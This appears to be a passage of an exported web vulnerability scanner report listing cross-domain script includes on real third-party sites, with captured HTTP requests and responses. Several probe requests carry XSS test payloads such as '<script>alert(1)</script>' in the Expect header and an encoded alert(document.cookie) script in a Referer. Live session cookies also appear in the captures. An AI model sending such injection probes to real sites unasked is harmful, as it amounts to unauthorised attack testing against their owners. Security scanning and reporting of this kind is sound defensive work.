</strong> <a href="http://store.reviveourhearts.com/truewoman10fortworthconf--conferencecdset.aspx">CD</a> | <a href="http://store.reviveourhearts.com/truewoman10fortworthconf--conferencemp3cdset.aspx">MP3 CD</a> | <a href="http://store.reviveourhearts.com/truewoman10fortworthconf--conferencedvdset.aspx">DVD</a>
...[SNIP]...
<td width="60"><a href="http://store.reviveourhearts.com/truewoman10fortworthconf--boblepinefoodbeautyandcontrolthreesnareswomenfacecd.aspx" title="buy">CD</a>
...[SNIP]...
<td width="60"><a href="http://store.reviveourhearts.com/truewoman10fortworthconf--carolynmcculleyhelovesmehelovesmenotlookingalovefromabiblicalperspectivecd.aspx" title="buy">CD</a>
...[SNIP]...
<td width="60"><a href="http://store.reviveourhearts.com/truewoman10fortworthconf--carolynmcculleywomensglobalissueschallengesforwomenindevelopingnationscd.aspx" title="buy">CD</a>
...[SNIP]...
<td width="60"><a href="http://store.reviveourhearts.com/truewoman10fortworthconf--crawfordandkarenlorittskeepingyourmarriagevowscd.aspx" title="buy">CD</a>
...[SNIP]...
<td width="60"><a href="http://store.reviveourhearts.com/truewoman10fortworthconf--liesyoungwomenbelievemp3cd.aspx" title="buy">CD</a>
...[SNIP]...
<td width="60"><a href="http://store.reviveourhearts.com/truewoman10fortworthconf--liesyoungwomenbelievemp3cd.aspx" title="buy">CD</a>
...[SNIP]...
<td width="60"><a href="http://store.reviveourhearts.com/truewoman10fortworthconf--liesyoungwomenbelievemp3cd.aspx" title="buy">CD</a>
...[SNIP]...
<td width="60"><a href="http://store.reviveourhearts.com/truewoman10fortworthconf--devititusthetableexperiencecreatingdeeperrelationshipsthroughhospitalitycd.aspx" title="buy">CD</a>
...[SNIP]...
<td width="60"><a href="http://store.reviveourhearts.com/truewoman10fortworthconf--fernnicholsprayeralastinglegacycd.aspx" title="buy">CD</a>
...[SNIP]...
<td width="60"><a href="http://store.reviveourhearts.com/truewoman10fortworthconf--hollyelliffembracinggodsperspectiveonmotherhoodcd.aspx" title="buy">CD</a>
...[SNIP]...
<td width="60"><a href="http://store.reviveourhearts.com/truewoman10conf--hollyelliffandkimwagnerfindingjoyinthejourneyasapastorswifecd.aspx" title="buy">CD</a>
...[SNIP]...
<td width="60"><a href="http://store.reviveourhearts.com/truewoman10fortworth--kayarthurhowtobecomeagodlywomanthroughknowingtruthforyourselfcd.aspx" title="buy">CD</a>
...[SNIP]...
<td width="60"><a href="http://store.reviveourhearts.com/truewoman10fortworthconf--thegenesisofgendercd.aspx" title="buy">CD</a>
...[SNIP]...
<td width="60"><a href="http://store.reviveourhearts.com/truewoman10fortworthconf--nancyleighdemossdailydevotionsdutyordelightcd.aspx" title="buy">CD</a>
...[SNIP]...
<td width="60"><a href="http://store.reviveourhearts.com/truewoman10fortworthconf--staceysmithunpredictableemotionscd.aspx" title="buy">CD</a>
...[SNIP]...
<td width="60"><a href="http://store.reviveourhearts.com/truewoman10fortworthconf--susanhensonabattleplanformoralpuritycd.aspx" title="buy">CD</a>
...[SNIP]...
<td width="60"><a href="http://store.reviveourhearts.com/truewoman10fortworthconf--susanhuntspiritualmotheringcd.aspx" title="buy">CD</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=xa-4d5596c6511294d4"></script>
...[SNIP]...
<div id="today_roh">
<a href="http://www.reviveourhearts.com/" title="Today on Revive Our Hearts">Revive Our Hearts</a>
...[SNIP]...
<li><a href="http://www.reviveourhearts.com" id="roh" title="Revive Our Hearts"><span class="none">
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<img src="http://pixel.quantserve.com/pixel/p-92Hvqf_eJ8FUE.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/>
</noscript>
...[SNIP]...

22. Cross-domain script include  previous  next
There are 73 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


22.1. http://ad.doubleclick.net/adi/N3671.SD148013N3671SN0/B5403038.2  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3671.SD148013N3671SN0/B5403038.2

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /adi/N3671.SD148013N3671SN0/B5403038.2;sz=728x90;pc=cbs509675;click0=http://adlog.com.com/adlog/e/r=19884&sg=509675&o=17939%253a&h=cn&p=2&b=5&l=en_US&site=109&pt=8300&nd=17939&pid=&cid=2&pp=100&e=3&rqid=01phx1-ad-e16:4DC066DE4A09DD&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=LcGErAoOYI4AAGp4RtMAAAIs&t=2011.05.04.01.28.49&event=58/;ord=2011.05.04.01.28.49? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/webware/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Wed, 04 May 2011 01:28:54 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=ISO-8859-1
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Content-Length: 8001

<html><head><title>Advertisement</title></head><body bgcolor="#ffffff" style="margin:0px;"><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Fri Apr 15 13:11:26 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...

22.2. http://beam.to/login.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://beam.to
Path:   /login.asp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /login.asp HTTP/1.1
Host: beam.to
Proxy-Connection: keep-alive
Referer: http://beam.to/start.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSCCAQQAQ=DAJIDBLDJFEMMIDDDPIMKNCN

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Date: Wed, 04 May 2011 02:15:06 GMT
Connection: close
Content-Type: text/html
Cache-control: private
Content-Length: 3116


<html><head><title>BeamTo</title>
<link href="css.css" rel=styleSheet type="Text/css">
</head>
<body bgcolor="#FFFFFF" text="#000000">
<table border="0" width="910" cellpadding="0" cellspaceing=
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

22.3. http://beam.to/start.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://beam.to
Path:   /start.asp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /start.asp HTTP/1.1
Host: beam.to
Proxy-Connection: keep-alive
Referer: http://www.beam.to/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSCCAQQAQ=DAJIDBLDJFEMMIDDDPIMKNCN

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Date: Wed, 04 May 2011 02:14:59 GMT
Connection: close
Content-Type: text/html
Cache-control: private
Content-Length: 4251


<html><head><title>BeamTo</title>
<!-- TradeDoubler site verification 1914031 -->
<link href="css.css" rel=styleSheet type="Text/css">
</head>
<body bgcolor="#FFFFFF" text="#000000">

<table b
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

22.4. http://news.cnet.com/webware/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://news.cnet.com
Path:   /webware/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /webware/ HTTP/1.1
Host: news.cnet.com
Proxy-Connection: keep-alive
X-Purpose: : preview
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tempSessionId=Cg5gp024kOetwdbzqyU; XCLGFbrowser=Cg8JIk24ijttAAAASDs; cnet_joinCallout=true; topTechNews=0; __csv=6522d442e56f04a6|0; wsFd=true; arrowFdCounter=-1; arrowLrps=1303941361935; arrowLat=1303946351887; arrowSpc=7; arrowQr_3=0.43558634360494813:0.23844470593739045:0.26487749137224303:0.06109145908541855; arrowQrIt_3=1; mad_rsi_segs=ASK05540_10572&ASK05540_10573&ASK05540_10578&ASK05540_10276&ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10269&ASK05540_10287&ASK05540_10290&ASK05540_10354&ASK05540_10394&ASK05540_10395&ASK05540_10537&ASK05540_10562; cnet_rvpCallout=3

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:28:50 GMT
Via: HTTP/1.0 phx1-rb-cnetnews-app1.cnet.com:8923 (cnwk.proxy.servlet.PathProxyServlet $Revision: 218012 $)
Content-Language: en-US
Expires: Wed, 04 May 2011 01:30:51 GMT
Cache-Control: max-age=240, stale-if-error=86400
X-CNET-HEADERREMOVE: Cache-Control
X-CNET-HEADER-Cache-Control: max-age=240
Edge-Control: max-age=240
Age: 119
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: arrowLrps=1303946351887:1303941361935; domain=.cnet.com; path=/; expires=Thu, 03-May-2012 01:28:50 GMT
Set-Cookie: arrowLat=1304472530240; domain=.cnet.com; path=/; expires=Thu, 03-May-2012 01:28:50 GMT
Set-Cookie: arrowSpc=1; domain=.cnet.com; path=/; expires=Fri, 03-Jun-2011 01:28:50 GMT
Set-Cookie: arrowTmUser=false; domain=.cnet.com; path=/; expires=Wed, 04-May-2011 02:28:50 GMT
Set-Cookie: arrowLnUser=false; domain=.cnet.com; path=/; expires=Wed, 04-May-2011 01:29:50 GMT
Set-Cookie: arrowBiChecked=true; domain=.cnet.com; path=/; expires=Wed, 04-May-2011 01:28:55 GMT
Set-Cookie: arrowHtcUser=false; domain=.cnet.com; path=/; expires=Wed, 04-May-2011 01:29:50 GMT
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Content-Length: 117262

<!DOCTYPE html> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<!-- Yoda loves you -->
<head> <title>Webware - Cool Web apps for everyone - CNET</title> <meta
...[SNIP]...
</script> <script type="text/javascript" src="http://i.i.com.com/cnwk.1d/html/rb/js/tron/oreo.moo.rb.combined.js"></script>
...[SNIP]...
<meta property="og:site_name" content="CNET"/> <script type="text/javascript" src="http://i.i.com.com/cnwk.1d/html/rb/js/tron/news/news.tron.bloglisting.compressed.js"></script>
...[SNIP]...
<!-- MAC ad --> <script type="text/javascript" src="http://dw.com.com/js/dw.js"></script>
...[SNIP]...
</script> <script type="text/javascript" src="http://i.i.com.com/cnwk.1d/Ads/common/manta/adFunctions-cnet.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://js.admeld.com/meld128.js"></script>
...[SNIP]...
<!--/prefoot--> <script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<!-- Begin comScore Tag -->
<script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
<!-- PRINT TRACKER --> <script type="text/javascript" src="http://i.i.com.com/cnwk.1d/html/pt/pt2.js" name="cleanprintloader"></script>
...[SNIP]...
<!-- DOM closed --> <script type="text/javascript" src="http://tcr.tynt.com/javascripts/Tracer.js?user=cry3Q6LBqr37zJadbi-bnq"></script>
...[SNIP]...

22.5. http://tag.admeld.com/ad/iframe/489/cnetnews/300x250/cnetnews_atf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/489/cnetnews/300x250/cnetnews_atf

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /ad/iframe/489/cnetnews/300x250/cnetnews_atf?t=1304490531988&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fcbsinteractive.com&refer= HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/webware/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9; D41U=3ZP6aPgJzYQImYO2fkBZoKF-nc31zVj-pLzxjzthWC1M8tPub3s1d8g

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
X-AdMeld-Debug: eyB0eXBlOiAgICAgICAgICJtZWxkIiwgIHB1YjogICAgICAgICAgNDg5LCAgc2l0ZTogICAgICAgICAiY25ldG5ld3MiLCAgYWQ6ICAgICAgICAgICAyOTkwMjcwLCAgbmV0d29yazogICAgICAiaG91c2UiLCAgc2l6ZTogICAgICAgICAiMzAweDI1MCIsICBmcmVxOiAgICAgICAgICIyLTk5OSIsICBkZWZhdWx0czogICAgICIwLTAiLCAgcmVxdWVzdDogICAgICAiNjg4OWFhYTUtZTZjYi00ZTkyLWI1NzItNDU3ZTQ4MjExYjMyIiwgIHVzZXI6ICAgICAgICAgImFjNWFmZTg5LWRiZTMtNGE5OS05YzYwLTU5ZjRmYjQ5NWNiOSIsICBjb3VudHJ5OiAgICAgICJVUyIsICBjaXR5OiAgICAgICAgICJEYWxsYXMiLCAgZG1hOiAgICAgICAgICA2MjMsICByZWdpb246ICAgICAgICJUWCIsICBpcDogICAgICAgICAgICIxNzMuMTkzLjIxNC4yNDMiLCAgZGVwdGg6ICAgICAgICAxLCAgdGFyZ2V0OiAgICAgICAiY25ldG5ld3NfYXRmIiwgIGRpdjogICAgICAgICAgIjY4ODlhYWE1LWU2Y2ItNGU5Mi1iNTcyLTQ1N2U0ODIxMWIzMiIsICB1cmw6ICAgICAgICAgICJodHRwOi8vY2JzaW50ZXJhY3RpdmUuY29tIiwgIGVsYXBzZWQ6ICAgICAgMCwgIGRlY2lzaW9uOiAgICAgImFkIiwgIGltcDogICAgICAgICAgMiwgIG5ldHdvcmtfaWQ6ICAgMTExLCAgYWNjb3VudF9pZDogICA2NjA2MywgIG5ldHdvcmtfbmFtZTogIkhvdXNlIEFydCIsICBwdWJsaXNoZXJfbmFtZTogImNic2ludGVyYWN0aXZlIiwgIGVjcG06ICAgICAgICAgIjAuMjUiLCAgZmVjcG06ICAgICAgICAiMC4yNSIsICBmaWxsOiAgICAgICAgICIxMDAuMDAiLCAgcGxhY2VtZW50OiAgICAiY25ldG5ld3NfYXRmIiwgIHJ1bGU6ICAgICAgICAgImNuZXRuZXdzX2F0ZiIsICBjcmVhdGl2ZV9pZDogICIiLCAgYmlkZGVyczogICAgICBbeyJuZXR3b3JrX25hbWUiOiJNYXhQb2ludCBJbnRlcmFjdGl2ZSAoUlRCKSIsICJiaWQiOiIwLjAwIiwiYWQiOjMwNjg0MTcsICJidXkiOjE3NiwibHAiOiIiLCJhbiI6IiIsInN0YXR1cyI6Im5vIGJpZCIsImZpZCI6MCwgImZjcG0iOiIwLjAwIn0seyJuZXR3b3JrX25hbWUiOiJNZWRpYU1hdGggKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjozMDY5MDg1LCAiYnV5Ijo1MDMsImxwIjoiIiwiYW4iOiIiLCJzdGF0dXMiOiJubyBiaWQiLCJmaWQiOjAsICJmY3BtIjoiMC4wMCJ9LHsibmV0d29ya19uYW1lIjoiTWVkaWE2IERlZ3JlZXMgKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjozMDY5OTM4LCAiYnV5IjozMzExLCJscCI6IiIsImFuIjoiIiwic3RhdHVzIjoibm8gYmlkIiwiZmlkIjowLCAiZmNwbSI6IjAuMDAifSx7Im5ldHdvcmtfbmFtZSI6IlRyaWdnaXQgKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjozMDY5NjE1LCAiYnV5IjoxMjQzLCJscCI6IiIsImFuIjoiIiwic3RhdHVzIjoibm8gYmlkIiwiZmlkIjowLCAiZmNwbSI6IjAuMDAifSx7Im5ldHdvcmtfbmFtZSI6IlR1cm4gKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjozMDY4NjYyLCAiYnV5IjoxODksImxwIjoiIiwiYW4iOiIiLCJzdGF0dXMiOiJubyBiaWQiLCJmaWQiOjAsICJmY3BtIjoiMC4wMCJ9LHsibmV0d29ya19uYW1lIjoiRGF0YVh1IChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6MzA2ODc2NywgImJ1eSI6MTk5LCJscCI6IiIsImFuIjoiIiwic3RhdHVzIjoibm8gYmlkIiwiZmlkIjowLCAiZmNwbSI6IjAuMDAifV0sICB0YXJnZXRpbmc6ICAgICIiLCAgYWR2ZXJ0aXNlcjogICAgIiIsICBsYW5kaW5nX3BhZ2U6ICAgICIiLCAgaG9zdDogICAgICAgICAibmotdGFnNDcifQ==
Content-Length: 1837
Content-Type: text/html
Date: Wed, 04 May 2011 01:28:54 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:300px;height:250px;margin:0;border:0">



...[SNIP]...
303%26external_user_id=%7euk%7e&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=303&admeld_call_type=redirect&admeld_callback=http://tag.admeld.com/match"/>

<script type="text/javascript" src="http://load.exelator.com/load/?p=104&g=060&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_dataprovider_id=3&admeld_callback=http://tag.admeld.com/pixel"></script>
...[SNIP]...

22.6. http://www.aacounty.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aacounty.org
Path:   /favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.aacounty.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: CFID=5864381;expires=Fri, 26-Apr-2041 01:01:26 GMT;path=/
Set-Cookie: CFTOKEN=e4d609d290ad2e8b-35305FC3-BB15-85EC-1A4BD816BA4B877A;expires=Fri, 26-Apr-2041 01:01:26 GMT;path=/
Set-Cookie: SESESSIONID=D16AB137429E4C25B59E5C0CA72CBC00;path=/
Set-Cookie: SESESSIONCODE=93F8CA9DE393C6A2E5E648E7A8D760DE;path=/
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:01:25 GMT
Content-Length: 35343

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<!-- template head text -->
   <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...
<head>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
</script>


<script src="//translate.google.com/translate_a/element.js?cb=googleTranslateElementInit">

</script>
...[SNIP]...

22.7. http://www.aligngi.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aligngi.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.aligngi.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Wed, 04 May 2011 00:56:41 GMT
Server: Apache
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 556

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...
</p>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F09828"></script>
...[SNIP]...

22.8. http://www.battleformarriage.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.battleformarriage.net
Path:   /favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.battleformarriage.net
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:45:06 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Accept-Encoding
Server: Apache/2.2.3 (Linux/SUSE)
Vary: Accept-Encoding
Content-Language: en-US
Set-Cookie: CFID=25241475;expires=Fri, 26-Apr-2041 00:45:06 GMT;path=/
Set-Cookie: CFTOKEN=908d9d917a5766e4-B877228F-EC95-BD3A-60B04DA7B8EB5015;expires=Fri, 26-Apr-2041 00:45:06 GMT;path=/
Set-Cookie: FRCUID=;path=/
Content-Length: 14020

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/loose.dtd">


<script language="JavaScript">
<!--
   document.cookie = 'jsEnabled=true; expires=Thu, 2 Aug 2050 20:47:1
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www.frcaction.org/css/global_v11.css"> <script type="text/javascript" src="http://www.frcaction.org/js/textsizer.js"></script>    <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script>
...[SNIP]...
<div style="display: none;">
       <script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=d26a1b16-abeb-451f-b586-4e7c1433cd1d&amp;type=website&amp;&amp;send_services=email%2Csms%2Caim&amp;post_services=twitter%2Cdigg%2Cfacebook%2Ctechnorati%2Cdelicious%2Cstumbleupon%2Creddit%2Cfurl%2Cmyspace%2Cfark%2Cybuzz%2Cmixx%2Cblogger%2Cwordpress%2Ctypepad%2Cgoogle_bmarks%2Cwindows_live%2Cbus_exchange%2Cpropeller%2Cnewsvine%2Clinkedin&amp;headerbg=%238C3219&amp;headerTitle=FRC%20Action"></script>
...[SNIP]...
<link rel="stylesheet" href="http://www.frcaction.org/jquery/jquery.twitter.css" type="text/css" media="all">

                       <script type="text/javascript" src="http://www.frcaction.org/jquery/jquery.twitter.js"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www.frc.org/sitesrttr/sites.css">
<script type="text/javascript" src="http://www.frc.org/sitesrttr/siterttr.js"></script>
...[SNIP]...

22.9. http://www.brightwurks.com/monitor/76246353061db9d2b69ec5f5450fc29ac0efff78/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.brightwurks.com
Path:   /monitor/76246353061db9d2b69ec5f5450fc29ac0efff78/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /monitor/76246353061db9d2b69ec5f5450fc29ac0efff78/ HTTP/1.1
Host: www.brightwurks.com
Proxy-Connection: keep-alive
Referer: http://www.quantumjumping.com/favicon.icoa34c4%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E42602835c1e
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Wed, 04 May 2011 00:45:13 GMT
Server: Apache/2.2.17 (Unix)
Set-Cookie: PHPSESSID=ekgsrvoeedr2lc4rj6glasoue4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en-US
Content-Length: 7579

<!DOCTYPE html>
<html lang="en">
<!--[if IE]><![endif]-->
<head>
   <meta charset="utf-8">
   <title>Brightwurks - Creators of Feed My Inbox and Help Scout</title>
<meta name="description" content="We bui
...[SNIP]...
<![endif]-->
   <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script>
...[SNIP]...

22.10. http://www.buckmasters.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.buckmasters.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.buckmasters.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 27719
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=srm-X41AzAEkAAAANDdjNWNlODAtYmNmNi00ZjY1LWE3MWYtNzU3MzNjNWUxZDY30; expires=Tue, 12-Jul-2011 12:15:22 GMT; path=/; HttpOnly
Set-Cookie: language=en-US; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:35:22 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html lang="en-US">
<head id="Head">
<!--**********************************************************************************-->
<!-- D
...[SNIP]...
<link rel="SHORTCUT ICON" href="/Portals/0/favicon.ico" /><script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" ></script>
...[SNIP]...
</script><script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

22.11. http://www.capitolhillseattle.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.capitolhillseattle.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.capitolhillseattle.com
Accept: */*
